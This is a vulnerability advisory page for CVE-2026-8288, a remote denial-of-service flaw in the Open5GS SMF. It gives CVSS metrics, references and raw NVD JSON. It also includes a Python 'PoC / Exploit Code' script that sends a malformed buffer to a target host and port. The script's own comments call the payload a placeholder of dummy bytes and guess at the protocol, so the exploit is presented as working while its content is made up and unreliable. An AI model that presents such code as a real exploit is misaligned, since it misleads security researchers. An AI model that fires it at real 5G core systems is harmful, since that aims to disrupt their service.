CVE-2026-8288

Description

A vulnerability was determined in Open5GS up to 2.7.7. This affects the function gsm_handle_pdu_session_modification_qos_flow_descriptions of the file src/smf/gsm-handler.c of the component SMF. Executing a manipulation of the argument n1SmMsg can lead to denial of service. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. The pull request to fix this issue awaits acceptance.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE

Open5GS <= 2.7.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-8288 (Open5GS DoS)
# This script demonstrates how to send a malformed PDU Session Modification Request.
# It targets the 'n1SmMsg' parameter to trigger a crash in Open5GS SMF.

import socket
import struct

def create_malformed_n1sm_msg():
    # Craft a payload that manipulates the n1SmMsg argument
    # Specific bytes depend on the internal structure expected by gsm_handle_pdu_session_modification_qos_flow_descriptions
    # This is a placeholder for the actual malicious buffer structure
    header = b'\x00' * 5  # Dummy header
    # Malicious payload designed to trigger the vulnerability
    payload = b'\x41' * 100 + b'\x00' * 4
    return header + payload

def send_exploit(target_ip, target_port):
    try:
        # Create a TCP socket (assuming GTP-C or similar interface)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        
        # Send the malicious PDU Session Modification Request
        exploit_data = create_malformed_n1sm_msg()
        s.send(exploit_data)
        print(f"[+] Exploit sent to {target_ip}:{target_port}")
        
        # Check if service is still responsive (optional)
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target IP and Port
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 2123  # Default GTP-C port, adjust as necessary
    
    print("[*] CVE-2026-8288 PoC Execution")
    send_exploit(TARGET_IP, TARGET_PORT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8288
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8288
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8288/
[4] VulDB https://vuldb.com/cve/CVE-2026-8288
[5] https://github.com/open5gs/open5gs/
[6] https://github.com/open5gs/open5gs/issues/4452
[7] https://github.com/open5gs/open5gs/pull/4513
[8] https://vuldb.com/submit/808489
[9] https://vuldb.com/vuln/362585
[10] https://vuldb.com/vuln/362585/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8288", "sourceIdentifier": "[email protected]", "published": "2026-05-11T13:16:12.073", "lastModified": "2026-05-12T17:18:17.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Open5GS up to 2.7.7. This affects the function gsm_handle_pdu_session_modification_qos_flow_descriptions of the file src/smf/gsm-handler.c of the component SMF. Executing a manipulation of the argument n1SmMsg can lead to denial of service. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. The pull request to fix this issue awaits acceptance."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.7", "matchCriteriaId": "0A46BC99-08E7-4D40-A908-76121E4AFCD5"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/open5gs/open5gs/issues/4452", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/open5gs/open5gs/pull/4513", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://vuldb.com/submit/808489", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/362585", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/362585/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}